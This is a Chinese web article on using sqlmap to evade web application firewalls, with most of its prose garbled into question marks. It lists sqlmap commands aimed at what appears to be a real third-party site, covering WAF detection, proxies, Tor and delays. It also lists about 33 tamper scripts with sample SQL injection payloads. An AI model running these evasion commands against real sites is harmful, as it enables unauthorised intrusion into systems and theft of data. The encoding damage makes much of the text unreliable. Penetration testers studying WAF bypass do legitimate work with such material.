???SQLMap??????????????????
???????????? ???????[ 2016/6/30 16:09:59 ] ?????????????????? ??????????
????0x00 ???
????????????繃????????WAF/IPS/IDS??????Web ????????????????????????????????????SQL???????????????????????????IP??????????????????????????????????????????????????WAF/IPS/IDS????sqlmap ??????????????????????????sqlmap ??????????????????????????????Ч?????????2?????????????????????????????????????????????????????
????0x01 ???WAF
?????????????ж??Web ?????????WAF/IPS/IDS?????????????????????????????????????????????????????WAF??????????nmap ??NSE??????WVS????????APPSCAN??????ж??У??????????????Щ???ж??????????????????sqlmap ???м???????WAF/IPS/IDS
????root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --identify-waf#
????root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --thread 10 --check-waf#???
????0x02 ??ò??????????
????root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --random-agent -v 2 #?????????????????????????????WAF???ò????????
????root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hpp -v 3#???HTTP ????????????????????????ASP.NET/IIS ????
????root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --delay=3.5 --time-sec=60 #??ó??????????????WAF??????????????
????root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --proxy=211.211.211.211:8080 --proxy-cred=211:985#????????????
????root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --ignore-proxy#???????????????????????????
????root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --flush-session#????????????
????root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --hex#??????ò??? --no-cast ??????????????
????root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --mobile #????????????????????
????root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tor # ???????
????0x03 ??y??????
????1 ???????
????root@kali:~# sqlmap -u "http://yiliao.kingdee.com/contents.php?id=51&types=4" --tamper=A.py??B.py#???A?????B
????2 ???????
????01 apostrophemask.py#??utf8?????????Example: ("1 AND '1'='1") '1 AND %EF%BC%871%EF%BC%87=%EF%BC%871'
????02 equaltolike.py#MSSQL * SQLite??like ???????Example: Input: SELECT * FROM users WHERE id=1 ??Output: SELECT * FROM users WHERE id LIKE 1
????03 greatest.py#MySQL?????????’>’ ????GREATEST?滻??????Example: ('1 AND A > B') '1 AND GREATEST(A??B+1)=A'
????04 space2hash.py#????滻?#?? ???????? ??????з???Input: 1 AND 9227=9227??Output: 1%23PTTmJopxdWJ%0AAND%23cWfcVRPV%0A9227=9227
????05 apostrophenullencode.py#MySQL 4?? 5.0 and 5.5??Oracle 10g??PostgreSQL??????????????滻???????????
????06 halfversionedmorekeywords.py#????????mysql????????????????????????mysql?汾?????
????07 space2morehash.py#MySQL?п???滻? #?? ??????????????? ???з???
????08 appendnullbyte.py#Microsoft Access????Ч???????λ?ü???????????????Example: ('1 AND 1=1') '1 AND 1=1%00'
????09 ifnull2ifisnull.py#MySQL??SQLite (possibly)??SAP MaxDB????? IFNULL ????? ?滻????’IFNULL(A?? B)’?’IF(ISNULL(A)?? B?? A)’
????10 space2mssqlblank.py(mssql)#mssql????滻??????????
????11base64encode.py#??base64????j Example: ("1' AND SLEEP(5)#") 'MScgQU5EIFNMRUVQKDUpIw==' Requirement: all
????12 space2mssqlhash.py#mssql??????滻???
????13 modsecurityversioned.py#(mysql?й??????????????????汾???;Example: ('1 AND 2>1--') '1 /*!30874AND 2>1*/--'
????14 space2mysqlblank.py#(mysql?п???滻??????????
????15 between.py#MS SQL 2005??MySQL 4?? 5.0 and 5.5 * Oracle 10g * PostgreSQL 8.3?? 8.4?? 9.0????between?滻??????>??
????16 space2mysqldash.py#MySQL??MSSQL?滻????????”????’ – ‘??????????????????????У?’ n’??
????17 multiplespaces.py#Χ??SQL?????????????Example: ('1 UNION SELECT foobar') '1 UNION SELECT foobar'
????18 space2plus.py#??+?滻???Example: ('SELECT id FROM users') 'SELECT+id+FROM+users'
????19 bluecoat.py#MySQL 5.1?? SGOS??????????????????Ч?????????????SQL??? ????滻=?like
????20 nonrecursivereplacement.py#???????????predefined SQL?????with??? suitable for????????? .replace??“SELECT”??””)?? filters
????21 space2randomblank.py#???????????“”???????????????????????????Ч??
????22 sp_password.py#???sp_password’??DBMS????????????????26 ??Ч?????β
????23 chardoubleencode.py#?url????(????????????)
????24 unionalltounion.py#?滻UNION ALL SELECT UNION SELECT??Example: ('-1 UNION ALL SELECT') '-1 UNION SELECT'
????25 charencode.py#Microsoft SQL Server 2005??MySQL 4?? 5.0 and 5.5??Oracle 10g??PostgreSQL 8.3?? 8.4?? 9.0url????
????26 randomcase.py#Microsoft SQL Server 2005??MySQL 4?? 5.0 and 5.5??Oracle 10g??PostgreSQL 8.3?? 8.4?? 9.0???????Сд
????27 unmagicquotes.py#???????? GPC addslashes??Example: * Input: 1′ AND 1=1 * Output: 1%bf%27 AND 1=1–%20
????28 randomcomments.py#??/**/???sql??????Example:‘INSERT’ becomes ‘IN//S//ERT’
????29 charunicodeencode.py#ASP??ASP.NET??????? unicode ????
????30 securesphere.py#???????????????Example: ('1 AND 1=1') "1 AND 1=1 and '0having'='0having'"
????31 versionedmorekeywords.py#MySQL >= 5.1.13??????
????32 space2comment.py#Replaces space character (‘ ‘) with comments ‘/**/’
????33 halfversionedmorekeywords.py#MySQL < 5.1?й??????????
??????
???·???
??????????????????
2023/3/23 14:23:39???д?ò??????????
2023/3/22 16:17:39????????????????????Щ??
2022/6/14 16:14:27??????????????????????????
2021/10/18 15:37:44???????????????
2021/9/17 15:19:29???·???????·
2021/9/14 15:42:25?????????????
2021/5/28 17:25:47??????APP??????????
2021/5/8 17:01:11
sales@spasvo.com